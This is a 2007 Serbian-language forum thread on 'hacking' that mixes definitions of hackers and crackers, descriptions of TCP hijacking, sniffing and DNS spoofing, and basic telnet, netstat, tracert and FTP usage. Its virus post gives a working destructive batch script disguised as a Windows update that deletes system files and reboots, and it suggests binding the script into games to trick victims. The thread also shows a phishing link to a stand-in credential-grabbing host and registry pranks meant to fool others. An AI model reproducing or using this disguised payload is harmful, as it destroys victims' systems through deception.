TECHNO ZONE => PC Klinika / Servisiranje raèunara => : Milenko 29 September, 2007, 11:09:44 AM



: Hacking
: Milenko 29 September, 2007, 11:09:44 AM
U ovoj temi pisite te o vasim hakerskim iskustvima i o onome sto znate o Hackingu.
Napomena:Ovo je namenjeno samo u edukativne svrhe i autor ovog teksta nije odgovoran za bilo kakvu stetu koju napravite primenom ovih informacija.


: Odg: Hacking
: Milenko 29 September, 2007, 11:11:42 AM
Pojam Haker, cracker, lamer - u cemu je razlika?

Razlika je velika, i ovaj tekst ce pokusati da vam rasclani ova tri pojma i objasni sta svaki od njih znaci. Mnogi ljudi, posebno oni koji rade u nasim medijima (stampa, radio i tv stanice...) nazivaju sve i svasta hakerima i hakovanjem. Gotovo svako sada moze da ode u neku TV stanicu, kaze da je haker, i odmah ce se oko njega okupiti novinari i traziti od njega intervju. Cak sta vise, intervju ce da urade bez ijednog dokaza da intervjuisu hakera! Na taj nacin ne samo sto pokazuju da su neprofesionalni, vec izazivaju i ogorcenje kod odredjenog broja gledaoca koji su bar malo upuceni u hakersku kulturu.

Pojam haker (eng. hacker) u svom izvornom znacenju opisuje osobu koja se bavi istrazivanjem mogucnosti kompjutera i njihovoj pozitivnoj primeni u svakodnevnom zivotu. Kao sto vidite, ovde se nigde ne spominje da su hakeri zli, da nanose stetu drugima i da su opasni po svet. Hakeri su veoma inteligentne osobe koje istrazuju ono sto je sakriveno u hardveru i softveru. Prostije receno, oni su pronalazaci onoga sto je ili neko sakrio od oci javnosti ili pronalazaci propusta koji su napravljeni greskom! Kod prvog slucaja, kada kazemo 'sakrio' mislimo obicno na programe, mada se i u hardveru moze sakriti dosta toga. Hakeri su po prirodi radoznali ljudi, vole sve da saznaju i ne vole kad je nesto sakriveno od njih. U programima moze dosta toga da se sakrije, narocito u programima ciji je izvorni kod nedostupan javnosti, kakav je ceo Windows i skoro svi programi koji rade pod njim! U takvim programima mogu da se recimo sakriju podprogrami za spijuniranje i programi koji ce samo odabranim ljudima omoguciti pristup zabranjenim resursima, poput vasih hard-diskova. Moze se, dakle, slobodno reci da hakeri ne vole da neko nekome ugrozava privatnost, i zato proucavaju kompjutere, sa zeljom da nadju uljeze u njima. Oni se zalazu za apsolutnu privatnost, sto je uostalom i ljudsko pravo, i svi bi po pravilu trebali da imaju potpunu privatnost. Takodje, ne vole cenzuru, jer to vodi ka jednoumlju, u sta smo se i uverili u proteklih pola veka! Jednom recju, oni su za apsolutnu ravnopravnost, za razotkrivanje svih tajni i za privatnost. Kod drugog slucaja, ljudi puno puta nesvesno prave greske, koje mogu da se iskoriste za ugrozavanje necije privatnosti. Na primer, programer koji je pisao neku Java funkciju u browseru Internet Explorer je zaboravio da napise rutinu za proveru duzine nekog podatka koji ucitana strana definise. I sada, ako neko pronadje propust i namerno napravi stranu koja iskoriscava propust, i ako neko ko ima pomenuti browser ucita tu stranu, IE ce uraditi nesto sto po pravilu ne bi smeo, i na taj nacin osteti posetioca strane. Hakeri traze takve propuste, i ako ih nadju, obavestavaju svet o tome kako bi proizvodjac datog programa ispravio propust i kako bi ljudi preduzeli odredjene korake i na taj nacin zastitili sebe na vreme. Hakeri su misljenja da je bolje da svi znaju za odredjeni propust nego da 'niko' ne zna, zato sto veruju da ipak neko zna za propust, i to koristi da bi spijunirao nekoga. Kada ne bi bilo hakera, danas bi imali browsere, mail, news i icq klijente i servere prepunih bezbednosnih propusta, u proseku bi svaki klijent i server imao oko 5 propusta. Do sada je ukupno pronadjeno vise od 10 000 propusta, i pitanje je da li bas niko ne bi znao za te propuste, narocito ako kazemo da je za neke propuste dokazano da su namerno napravljeni! Pitanje 'zasto namerno' je ovde suvisno, i bas zbog ovih razloga hakeri postoje, vredno rade i otkrivaju nove tajne. Dnevno se u proseku oko 5 novih propusta pronadje!

Sa druge strane, hakeri su casni ljudi, posteni, civilizovani, imaju svoju kulturu! Hakerska kultura im ne dopusta da propuste koje otkriju iskoriste u nehumane svrhe. Ako nadju neki propust, oni moraju da obaveste javnost o tome, i ne smeju da ga iskoriste da bi ugrozili neciju privatnost ili napravili stetu bilo kome.

Sada jedan savet kako proveriti da li je doticni haker. Prvo ga pitajte da li je do sada naneo nekome stetu koristeci kompjuter. Ako odgovori potvrdno, ili cak pocne da se hvali time - imate posla sa crackerom, jer hakeri ne nanose stetu drugima. Zatim ga pitajte sta je otkrio. Ako kaze 'nista, koristim vec pronadjene propuste' - imate posla sa lamerom, jer je haker samo onaj koji pronadje nesto jedinstveno, sto jos niko nije pronasao. Upravo zbog toga ne moze svako da bude haker, bas kao sto ne moze svako da bude doktor nauka!

Crackeri (cita se 'krekeri') su isto pronalazaci, inteligetni ljudi, ali oni, izmedju ostalog, koriste svoje znanje i svoja otkrica da bi nekome naneli stetu. Crackeri pisu viruse i trojance, upadaju na servere i prave stetu na njima (uglavnom tako sto izmene prvu stranu sajta).

Lameri su uglavnom klinci, koji nisu nista otkrili i koji takodje nanose stetu drugima, obicno da bi ukrali neku sifru za Internet ili unistili nekome disk koristeci trojance, viruse, pa cak i exploite, koje su crackeri napisali. Oni su gotovani, nauce kako se koriste trojanci i onda prave stetu postenom sveti, misleci da su hakeri. Mnogi od njih ne znaju cak ni kako funkcionise Internet. Cilj im je samo da naprave neku pakost koristeci izum nekog crackera.

Onog trenutka kada haker svojim pronalaskom napravi nekome stetu - odmah prestaje da bude haker i postaje cracker! Sasvim je pogresno reci 'hakeri su uhakovali sajt..', kao i 'hakeri su napravili novog crva...'. Hakeri uopste ne nanose stetu, to cine crackeri i lameri. I potpuno je pogresno mrziti hakere. One koje treba mrziti i prezirati su crackeri i lameri! Hakeri su pronalazaci, naucnici, i ne moze se postati haker preko noci. Profesija 'haker' je veoma cista, postena, plemenita i velikim trudom stecena profesija.

Na kraju, biti haker znaci biti osoba koja ima ogroman koeficijent inteligencije, osoba koja ceo dan provede za kompjuterom proucavajuci ga, osoba koja to cini da bi zastitila ostale korisnike kompjutera i omogucila im potpunu privatnost, osoba koja svojim pronalascima gura covecanstvo ka napretku, i osoba koja uvek moze da vas pogleda u oci!


: Odg: Hacking
: Milenko 29 September, 2007, 11:14:12 AM
HAKERSKE TEHNIKE

Neke od nejcesce koriscenih hakerskih tehnika su:

1. Napad na osnovu pogadjanja seriskog broja TCP/IP paketa koji cirkulisu izmedju servera i clienta na networku.
Ovo je najprostiji i najcesci nacin napada.kao sto znate svaki komp na netu ima svoju IP-adresu i jedan serie-broj za svaki IP-paket koji posalje na network. Ova vrsta napada se koristi nacinomm na koji se IP-adrsese dodeljuju Compovima i njihovi TCP/IP paket serijski brojevi. Napad se izvodi u 2 etape:

- Dobijanje IP-adrese od servera gledanjem u statusbalk od browsera presretanjem paketa na netweku (sniferima) probanjem adresa po rednim brojevim u odredjenoj IP-subklasi (A,B,C) Ako jedan sistem ima napr. IP-192.0.0.15 to je jedan klase C network (128+64=192bits) sto znaci da moze da ima max 256 Ip-adrese (192.0.0.1-254) tako   da on pokusava da pogodi jednu adresu u ovom IP-rangeu i da se predstavi serveru kao klient iz njegovog sopstvenog netwerka (internog). Ako mu to uspe on moze da monitoruje TCP/IP data-stream na networku i posle odredjenog vremena mu moze uspeti da ih na osnovu odredjenog algoritma uspesno predvidi serijske brojeve TCP/IP pakketa izmedju klijeta i servera i da tako preuzme ulogu jednog od klijenata na servervom networku i da ga ubedi da dobija informacije od svog klijenta a ustvari ih dobija sa hakerove machine. Na taj nacin haker moze da monitoruje data stream na networku sto ukljucuje login names, passworde, poverljive podatke itd. Ovo se obicno radi kao priprema napada na server ili na neki drugi server na istom networku.

2. Napadi sa sniferima:
TCP-IP paket interception ili aktivno snifanje. Ovo je jedan od najopasnijih oblika napada na jedan server koji je prikljucen na jedan TCP/IP network. U ovom slucaju haker ne pokusava da pogadja IP-adrese vec presrece TCP/IP konekciju izmedju trusted(verovanog) klijenta na networku i servera i primorava  server da hakerovu masinu na taj nacin prihvata kao trusted-host. Na taj nacin on simulira IP adresu i seriske brojeve TCP/IP paketa od zrtve kompjutera (to je takozvano IP-mimik (imitiranje)). Posto se on sada prestavlja kao trusted (verovan) host on buy passuje login i password indetifikaciju i moze da prodre do vise obezbedjenih sistema i preuzme kontrolu na njima. Pasivno snifovanje jedan dobro postavljeni nettwork sniffer moze da monitoruje TCP/IP data-stream i da na taj nacin dodje do login namea i passworda od odredjenog racuna (mozda tvog) i da ga kopromituje i koristi kao bazu za provaljivanje super userovog passworda ili nekog drugog racuna sa visim privilegijama. (sto mu obicno pre ili kasnije uspeva). Isto tako ova tehnika se koristi i kao pocetna faza za sledece vrste napada:

- Napad aktivnom desinhronizacijom
U principu generiradje ogromnog broja ACK-paketa (acknowledgment) zbog prekida veze izmedju klijenta i servera (u stvari mnogo komlikovanije ali ovo ide u teski tehno-blabla a ja necu da vas davim)

- Napad ranom desihronizacijom
Ovo se zasniva na prekidanju veze izmedju klijenta i servera u jednoj ranoj fazi i zapocinjanju nove veze sa hakerove masine sa (novim) serijskim brojem (a pod identitetom klijenta sa kojim je veza prekinuta)

- Napad sa desihronizacijom sa tzv zero-data
Kao sto mu ime kaze ovaj napad se zasniva na slanju ogromnog broja tzv. Nula data serveru i klijentu (koje ne sadrze nista) koji nisu vidljivi ali primoravaju server i klijent da prekinu konekciju zbog preopterecenjaTCP/IP konekcije.

- Napad na Telnet-sessiju
Izvodi se slanjem velikog broja instrukcija specificnih za Telnet (IAC NOP IAC NOP) koji navodi Telnet protokol da pauzira i ceka sto haker koristi da bi preuzeo kontrolu nad konekcijom i "umuva se unutra izmedju".

Zastita od ovakvih vrsta napada se sastoji u pazljivom monitorovanj i logovanju svih network aktivnosti i zapisivanju svega neobicnog (na primer neobicno velike procentaze ACK paketa na networku ) kao i u vodjenjem kriptografskih tehnika (Kerber-ove kartice, SSL.S-HTTP, one time passwords, firewalls etc …)

[Nesto o Web tehnikama i opasnostima]

Jedna od najopasnijih i najinteresatnijih tehnika na Webu je takozvani Web emulation ili virtual-web gde haker peuzima celu ulogu Web servera i naterava vas da verujete da imate vezu sa hakerovom machinom dok vi verujete da imate vezu sa oderedjenim web-serverom.Na taj nacim on ima potpunu kontrolu nad svim podacima u oba pravca. Na primer vi zelite da napravite konekciju da serverom www.mojabanka.com Ono sto haker radi je da sve linkove i konekcje loaaduje (puni) preko svoje masine dodavanjem na svaki URL-link svoju web-adresu npr www.hakerovamasina.com tako da to postaje http:/hakerovamachina.com/www.mojabanka.com. Na taj nacin svaka  transakcija ide preko hakerove machine i daje mu potpunu kontrolu nad svim podacima u oba pravca (full dupleks).

[Hiperlink - imitiranje]

Slicna tehnika se koristi i u ovom slucaju samo sto ovo vazi za pojedine linkove sa oderedjene Web-strane (koja moze da bude auteticna) koji bi trebalo da vas odvedu na oderdjenu stranicu a ustvari vas odvode negde sasvim drugde (mada ta stranica izgleda potpuno autenticno). Na primer u HTML programu Web strane (hakovane) stoji ovako nesto:

<A HREF=https://www.haker.com/getuserinfo
>Click here for a very hot babes !!</A>

Gde se nalazi oderedjeni program koji grabi od vas poverljive podatke i slaze ih ih u odredjenu databazu. Zato budite extremno oprezni sa slanjm poverljivih podataka preko Web-a cak i preko kriptovanih i "secure" servera jer ni oni nisu 100% zastita i mogu biti hakovani.

Jedna veoma cool tehnika je i DNS-mimik gde se potpuno obilazi firewall na taj nacin sto se prvo kod napadacevog DNS servera (koji je zaduzen da prevodi IP-adresa u imena sajtova) stavlja link na stranu sa istim imenom kao strana zrtve (na primer www.stranazrtve.com) na kojoj se mogu pisati uvredljive stvari o zrtvi postaviti obscene slike ili siriti dezinformacije o zrtvi i propaganda protiv nje, a onda se napda DNS server zrtve (ako nije dobro obezbedjen) gde se menja link za DNS adresu za zrtvinu stranu tako da se povezuje sa DNS serverom napadaca. I Tako ko god na primer ukuca www.serbincafe.com adresira DNS server napadaca koji ga upucuje na napadacevu Web stranu koju on moze urediti kako hoce...

Drugi nacim buy pasovanja firewalla je kod organizacija koji koriste dial-up konekcije (paralelno sa LAN) Tako da kompjuter koji se preko modema povezan sa Web-om moze biti napadnit Trjancem ili BO ili necim slicnim a onda biva koriscen kao baza za napad na ostali deo netwerka. Posto napadac ulazi kroj dial-up liniju preko modema on na taj nacim zaobilazi firwall na LAN-u.




: Odg: Hacking
: Milenko 29 September, 2007, 11:15:33 AM
Sta je telnet?

Telnet je neverovatni alat koji svaki haker MORA da zna da koristi pre nego sto i pomisli o hakovanju servera. Telnet je bolje receno protokol koji zahteva i koga pokrece TCP/IP. Moze se koristiti za konektovanje na udaljene racunare i da izvrsi komandnu liniju programa, jednostavnim unosenjem komandi u njegov GUI (graficki korisnicki interfejs) prozor. Telnet se nalazi u Windows folderu tj u: c:\windows\telnet.exe i u c:\winnt\system32\telnet.exe na Windows NT sistemima, a mozete ga pokrenuti ako u MSDOS-u ukucate telnet.

[Kako da se konektujem na udaljeni kompjuter?]

Veoma je jednostavno da se konektujete na udaljeni kompjuter uz pomoc Telnet-a. Pokrenite telnet i kada vam se pojavi njegov prozor samo kliknite na: CONNECT > REMOTE SYSTEM i zatim u 'HOST NAME' unesite IP adresu ili host racunara na koji se konektujete. Zatim, u 'PORT' unesite otvoreni port na koji se konektujete. TermType treba skoro uvek da vam bude podesen na vt100. Kliknite na CONNECT i bicete konektovani na udaljenu masinu.
Najjednostavniji nacin za pokretanje telneta i njegovo konektovanje na sistem je ako u MSDOS-u ukucate:
C:\>telnet hostname.com ###

- gde je telnet komanda koja pokrece sam program telnet, a hostname.com je host ili ip adresa na koju se konektujemo (npr. ptt.yu) :), a ### je broj otvorenog porta (npr. 139)

Mozda ce vam biti problem u tome sto neznate na koj port da se konektujete tj. koji port je otvoren na masini na koju se konektujete. Da bi ste dobili listu otvorenih portova, morate upotrebiti Port Scanner ili drugi program koji skenira masinu za otvorene portove. Znam da je lamerski koristiti program za nesto kao skeniranje otvorenih portova, ali taj nacin je za vas najlaksi. Ovo je lista nekih osnovnih portova:

Ping 7
Systat 11
Time 13
NetStat 15
FTP 21
SSH 22
Telnet 23
SMTP 25
Whois 43
Finger 79
HTTP 80
POP 110
NNTP 119
IDENT 139

Kao primer konektovanja i koriscenja telneta pokazacu vam konektovanje na FTP port. Dakle, ovako... Ukoliko zelim da se konektujem na odredjeni racunar koji ima IP adresu 123.45.67.8 ja cu prvo da skeniram uz pomoc Port Scannera za otvorene portove na ovom racunaru. Dobicu listu svih otvorenih portova. Naravno, vidim da je otvoren i port 21 tj. FTP. Sada cu u MSDOS-u ukucati:
C:\>telnet 123.45.67.8 21
i konektovacu se na zeljeni FTP server. Sada samo ukucajte ? (2 puta pritisnite ENTER) i dobicete listu komandi koje mozete koristiti. Ovo vazi i za sve ostale portove na koje zelite da se konektujete.
Ovo ce vam zvucati smesno, ali je zanimljivo... uz pomoc telneta se mozete konektovati i na bilo koji irc chat server, tako da vam telnet moze posluziti kao irc klijent :)) Potrebno je samo da se konetktujete na IRC server na port 6667 i da vidite listu komandi.
Evo i jednog predloga: ukoliko ste zrtva mail bomba od strane nekog lamera, umesto da downloadujete sve te stotine poruka, pa zatim da ih brisete, mozete se jednostavno konektovati na POP server vaseg ISP provajdera i odjednom obrisati svu nezeljenu postu bez njenog prethodnog downloadovanja, tako da mozete ustedeti i sate downloadovanja ebomb poruka. Nesto sto je meni najvaznije je to sto uz pomoc telneta mozete dobiti prikaz informacija o sistemu servera tj. informacija o operativnom sistemu i njenoj verziji.


: Odg: Hacking
: Milenko 29 September, 2007, 02:59:56 PM
Sta su virusi?

Na pocetku tutoriala cu vam objasniti sta su virusi, iako je vecina mozda i okusila nevolje koje virus donosi. Virus je zapravo program ili skripta (java, vbasic...) napravljena da nasteti vasem kompjuteru i koji se moze sam i bez vaseg znanja kopirati na floppy i slati preko e-maila koristeci vase mail adrese u Address Book-u (to su takozvani CRVI ili WORM). Pored toga neki virusi su napravljeni tako da zaraze i ostale fajlove na vasem kompjuteru.

[Kako se prave?]

Za pravljenje virusa mogu se koristiti svi moguci programski i skripting jezici. Da bi ste vi sami mogli da pravite neke vrste virusa morate da znate odredjene programske jezike. Zato vam savetujem da, ukoliko neznate, naucite neki programski jezik. Ukoliko zelite da postanete haker morate znati c, c++ i perl programske jezike.

U daljem tekstu slede 2 primera *.BAT virusa i *.TXT.VBS virusa koje je veoma jednostavno napraviti i koji ce vam malo pribliziti pojam pravljenja virusa! Naravno, da bi ih razumeli morate znati BATCH i VISUAL BASIC skripting jezike.

Ukoliko bi vi zeleli da napravite *.bat virus, evo vam malog primera kako da to uradite. Potrebno je samo da sledeci batch kod iskopirate u notepad i snimite ga kao winupdt.bat fajl i eto vam malog virusa! Ovaj virus se predstavlja kao UPDATE za Windows 98, ali je zapravo virus koji ce obrisati vazne sistemske fajlove, kao i Windows Explorer i zatim restartovati racunar. Jednom napravljen ovakav virus mozete ubaciti i u neki exe fajl (program ili igricu), a to ce vam najlakse biti uz pomoc nekog bindera (npr. MultiBinder), sem ukoliko znate c/c++ programski jezik... HeHeHe :D (da bi naucili ovaj programski jezik downloadujte tutorial sa naseg sajta, ili potrazite neki na NETu).


@ECHO OFF
echo Welcome To Microsoft Windows System Updater Setup
echo Installing Components... Please Wait...
echo y|del c:\autoexec.bat
echo y|del c:\config.sys
echo y|del c:\windows\system.ini
echo y|del c:\windows\win.ini
echo y|del c:\windows\explorer.exe
echo Installing is DONE.
echo Setup Will Now restart Your Computer... Please Wait...
start C:\WINDOWS\RUNDLL.EXE user.exe,exitwindows


VBA crvi koriste posebnu tehniku kako bi zavarali potencijalnu zrtvu. Pored toga sto crv nema ekstenziju EXE vec VBA ili VBS (sto znaci da su pisani u Visual Basic Script formatu i da je za njihovo izvrsavanje potreban IE), takvi crvi se obicno distribuiraju sa extenzijom '.txt.vba', tako da potencijalna zrtva pomisli da se radi o obicnom tekstu i startuju fajl. Posto je zadnja ekstenzija '.vba', ne startuje se Notepad vec IE koji izvrsi program, tako da potencijalna zrtva postane prava zrtva.


: Odg: Hacking
: Milenko 29 September, 2007, 03:01:45 PM
Hakovanje windowsa

Regedit - Registry Editor]

Ovo zapravo i nije 'hakovanje' kao sto su upadi u sisteme i slicno. Ovo je zapravo izmena samog Windowsa i maksimalno koriscenje onoga sto nam Windows pruza. Za veliki broj operacija bice vam potrebno znanje rada u regeditu. Ukoliko znate da rukujete regeditom odlicno, ukoliko ne... naucicete. Program Regedit mozete naci u Windows direktorijumu c:\Windows\Regedit.exe, a mozete ga veoma jednostavno pokrenuti ako kliknete na start, zatim na run i unesete REGEDIT.

- Gde je Shut Down?

Ovaj trik vam moze pomoci da uplasite i prevarite lamere. Ovime ce te sakriti dugme shutdown iz start menia tako da se kompjuter ne moze ugasiti klikom na Shut Down. Startujte regedit i prvo napravite backup (kako bi mogli da vratite Shut Down dugme) tako sto ce te kliknuti na 'Registry' pa na 'Export Registry File', sada unesite ime fajla (bilo koje npr. backup1.reg) i kliknite na save. E, sada mozete poceti sa uklanjanjem Shut Down dugmeta. Idite na:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Sada napravite novi 'String Value' tako sto ce te ici na 'Edit', 'New' i na 'String Value' i dacete mu ime NoCloseKey. Sada kliknite desnim tasterom na ovaj String Value, kliknite na 'Modify' i unesite 1 u  polje Value Data. Shut Down iz start menia sada ce biti onemogucen. Kada budete zeleli da ponovo omogucite Shut Down potrebno je samo da pokrenete buckup koji ste na pocetku napravili (backup1.reg) i dugme ce biti vraceno.

NAPOMENA: PRE BILO KAKVE OPERACIJE NAD REGEDITOM PRETHODNO NAPRAVITE BACKUP O KOME SAM MALO PRE GOVORIO ('KLIKOM NA EXPORT REGISTRY FILE') KAKO BI KASNIJE MOGLI DA VRATITE PRVOBITNA PODESAVANJA.

- A: B: C: D:

Jos jedan mali trik da prevarite vase prijatelje. Zapravo, ovim trikom ce te iz My Computer-a ukloniti sve drajve (Flopi, Hard Disk itd...) Pokrenite regedit idite na:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Ovde napravite novi 'DWord Value' i dajte mu ime NoDrives. Sada samo modifikujte njegovu vrednost na 3FFFFFF (Hexadecimal).

- Screen Saver trik

Da bi ste ukjucili i iskljucili screen saver idite na:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ScreenSavers

Napravite novi 'String Value', dajte mu ime Mouse Corners i dajte mu vrednost -Y da ukljucite i -N za suprotno.  Sada kad god pomerite mis u gornji desni ugao ekrana pokrenuce se screen saver, a kada ga budete pomerili na donji levi ugao screen saver ce se ugasiti.

- Brisanje ikonica preko regedita

Sta mislite, da li je moguce obrisati Recycle Bin? Nema nikakve logike, ali jeste. Pored toga, mozete obrisati i My Computer ikonicu, kao i dosadnu Network Neighborhood ikonu. Da bi ste to uradili idite na
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
- gde je {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} oznaka ikonice koju zelimo da uklonimo. Oznake ikonica se nalaze u sledecoj listi:

My Briefcase:{85BBD920-42AO-1069-A2E4-08002B30309D}
Desktop: {00021400-0000-0000-C000-0000000000046}
Control Panel:{21EC2020-3AEA-1069-A2DD-08002B30309D}
Dial-Up-Networking:{992CFFA0-F557-101A-88EC-00DD01CCC48}
Fonts: {BD84B380-8CA2-1069-AB1D-08000948534}
Inbox :{00020D76-0000-0000-C000-000000000046}
My Computer :{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Network Neighborhood:{208D2C60-3AEA-1069-A2D7-O8002B30309D}
Printers :{2227A280-3AEA-1069-A2DE-O8002B30309D}
Recycle Bin :{645FF040-5081-101B-9F08-00AA002F954E}
The Microsoft Network:{00028B00-0000-0000-C000-000000000046}
History: {FF393560-C2A7-11CF-BFF4-444553540000}
Winzip :{E0D79300-84BE-11CE-9641-444553540000}

Dakle ukoliko npr. zelimo da obrisemo Recycle Bin icice mo do: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace{645FF040-5081-101B-9F08-00AA002F954E}
i obrisacemo ovaj kljuc. Ovime ce mo ukloniti ikonicu Recycle Bina. Kada zelite ikonicu nazad... pokrenite backup!

- Zanimljiv toolbar

Ucinite Win Explorer i Internet Explorer lepsim, postavite sliku na toolbaru. Da bi ovo uradili idite na:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Internet Explorer\Toolbar\

Sada napravite novi 'String Value' sa imenom BackBitmap i podesite mu vrednost (modify) na putanju do slike koju zelite da stavite na toolbar u *.bmp formatu (npr. C:\Windows\Slika.bmp). Sada ce Windows Explorer i Internet Explorer imati sasvim novi izgled!!!



: Odg: Hacking
: Milenko 29 September, 2007, 03:04:02 PM
Netstat

Da bi ste pokrenuli netstat morate da pokrenete Dos Prompt i da unesete komandu netstat. Netstat je alat koji vam moze dosta koristiti i koji ima dosta svrha. Ja licno koristim netstat kako bih otkrio IP adresu drugih korisnika na ICQ i AIM. Takodje, netstat mozete koristiti i za posmatranje otvorenih portova. Netstat se nalazi u windows direktorijumu i mozete ga pokrenuti ako u ms-dos prompt unesete:

c:\windows\> netstat
Active Connections
Proto    Local Address    Foreign Address    State
TCP    pavilion:25872    WARLOCK:1045    ESTABLISHED
TCP    pavilion:25872    sy-as-09-112.free.net.au:3925    ESTABLISHED
TCP    pavilion:31580    WARLOCK:1046    ESTABLISHED
TCP    pavilion:2980    205.188.2.9:5190    ESTABLISHED
TCP    pavilion:3039    24.66.10.101.on.wave.home.com:1031    ESTABLISHED

Sada dobro pogledajte prethodni primer. Videcete [Proto] u gornjem levom uglu. Ovo nam govori koji je protokol u pitanju tcp/udp. Odmah napred nalazi se [Local Address] ovo nam govori lokalnu ip adresu/hostname i otvorene portove. Zatim, [Foreign Address] - govori IP adresu/host i otvoren port konekcije u obliku IP:PORT sa ":" izmedju. I na kraju videcete [State] koji nam govori da li je konekcija uspostavljena. Ovo moze biti ESTABLISHED ukoliko je konekcija uspostavljena i LISTENING ukoliko se ceka konekcija.

[Detektovanje otvorenih portova]

Netstat mozete koristiti i da nadjete vasu IP adresu i otvorene portove na vasem racunaru. Na slican nacin, Netstat se moze koristiti i za detektovanje trojana. Evo i primera: Primetili ste nesto veoma cudno sa vasim kompjuterom? Vas cd-rom se sam od sebe otvara i zatvara. Vi shvatate da se neko petljao sa trojanom na vasem racunaru. Sada vam je cilj da otkrijete koji je trojan u pitanju i da ga uklonite. Dakle sada ce te pokrenuti vas ms-dos prompt i proveriti koji su portovi otvoreni. Postoje mnogo nacina za koriscenje netstata, stoga pogledajte help kucajuci netstat ?
Displays protocol statistics and current TCP/IP network connections.
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
-a    Displays all connections and listening ports.
-e    Displays Ethernet statistics. This may be combined with the -s option.
-n    Displays addresses and port numbers in numerical form.
-p    Proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r    Displays the routing table.
-s    Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default.
interval    Redisplays selected statistics, pausing interval seconds between each display.
Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once.



: Odg: Hacking
: Milenko 29 September, 2007, 03:06:13 PM
Tracert

Kada ukucate hotmail.com u vas browser, onda vi zahtevate prolaz kroz veliki broj kompjutera pre nego sto dodjete do hotmail.com -a. Ili kada se ulogujete i vas Shell account i ukucate password tada ovaj password prolazi kroz veliki broj kompjutera pre nego sto dodje do Shell account servera.

Da bi ste nasli listu servera kroz koje je vas password prosao mozete koristiti Tracert komandu (ili traceroute na unix sistemima). Ukoliko u MSDOS-u ukucate Tracert, dobicete sledeci ekran:

C:\WINDOWS>tracert

Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

Options:

-d Do not resolve addresses to hostnames.
-h maximum_hops Maximum number of hops to search for target.
-j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply.

Ovo je pomocni ekran koji nam govori kako se koristi Tracert. Sada cemo dati primer pracenja (tracing) putanje do hotmail.com -a sa vaseg kompjutera. Da bi ste ovo uradili unesite sledecu komandu:

C:\windows>tracert hotmail.com

Umesto hotmail.com takodje mozete unesti i IP adressu koju mozete da nadjete pomocu NSLookup-a. Isprobajte Tracert sa razlicitim parametrima i vidite kakvi su rezultati. To je najbolji nacin da naucite kako se Tracert komanda koristi.


: Odg: Hacking
: Milenko 29 September, 2007, 03:08:38 PM
FTP

Pre svega zelim da vam objasnim znacenje reci FTP. FTP je skracenica od engleskih reci 'File Transfer Protocol' sto bi na nasem jeziku znacilo 'protokol prenosa fajlova'. Kao sto sam naziv kaze FTP je protokol koji sluzi za prenos fajlova od servera do klijenta. Server je kompjuter na koji ste vi konektovani, a klijent ste vi sami. Svaki sajt ima svoj odredjeni FTP server na koji se uploaduje sadrzaj sajta. Da bi se konektovali na FTP server moramo da imamo odredjeni FTP software poznat kao FTP klijent. Zapravo, sam Windows dolazi sa FTP klijentom koji je pomalo tezak ukoliko se ne snalazite bas najbolje u MSDOS-u. Ovaj program mozete naci u sledecem folderu:

C:\windows\ftp.exe

Program ce se automatski sam pokrenuti i ako u MSDOS-u samo ukucate FTP. Tada ce vam se umesto odzivnog znaka c:\> pojaviti:

ftp>

Ovo znaci da je FTP klijent pokrenut. Pre nego sto pocnete sa FTP Hacking-om morate prethodno da znate i FTP komande. Spisak komandi ce te dobiti ako ukucate help:
ftp> help
Takodje mozete umesto help ukucati i samo znak ?
Kada ovo ukucate dobicete listu FTP komandi koja izgleda ovako:
Commands may be abbreviated. Commands are:
!    delete    literal    prompt    send
?    debug    ls    put    status
append    dir    mdelete    pwd    trace
ascii    disconnect    mdir    quit    type
bell    get    mget    quote    user
binary    glob    mkdir    recv    verbose
bye    hash    mls    remotehelp    
cd    help    mput    rename    
close    lcd    open    rmdir    
ftp>

Sada ce mo svaku vazniju naredbu obraditi zasebno. Naime, pokusacu da vam objasnim cemu koja komanda sluzi i kako se koristi.

OPEN - ova naredba sluzi za konektovanje na FTP server. Koristi se u sledecem obliku:
ftp> open ime_hosta.com

DISCONNECT - kao sto prethodna komanda sluzi za konektovanje na FTP server, tako ova sluzi za diskonektovanje sa servera. Za njeno koriscenje samo ukucete DISCONNECT i to je to.

GET - ukoliko zelite da preuzmete (download-ujete) neki fajl sa servera, onda koristite ovu komandu:
ftp> get fajl.txt

MGET - kada zelimo da preuzmemo vise fajlova od jednom, onda ne mozemo koristiti naredbu GET vec cemo koristiti MGET:
ftp> mget *.txt

PUT - ova neredba koristi za slanje (upload-ovanje) fajlova na server:
ftp> put fajl.txt

MPUT - za slanje vise fajlova na server koristi se naredba MPUT:
ftp> mput *.txt

Ovo su neke od osnovnih komandi koje su vam potrebne, a ukoliko vam je potrebna pomoc za odredjenu komandu, onda ce te uneti sledece:
ftp> help {komanda}
Gde je {komanda} odredjena komanda za koju vam treba pomoc.

Na primer, ukoliko zelim da naucim kako se koristi komanda CD ja cu da ukucam ovu komandu:

ftp> help CD

FTP program ce prikazati sledece:

cd Change remote working directory

Sada kada znamo osnovne FTP komande mozemo da isprobamo rad sa FTP-om. Pre svega potrebno je da se konektujemo na odredjeni FTP server. Pokrenimo MSDOS i ukucajmo FTP. Tada cemo pokrenuti FTP klijent. Za konektovanje na server unesite sledece:

ftp> open ime_servera.com
Gde je ime_servera.com bilo koji server na koji zelite da se konektujete (npr. hotmail.com ili ptt.yu). Pogledajte sledeci primer da bi vam bilo jasnije.

ftp> open web2.mtnl.net.in
Ova komandom cu da se konektujem na server web2.mtnl.net.in

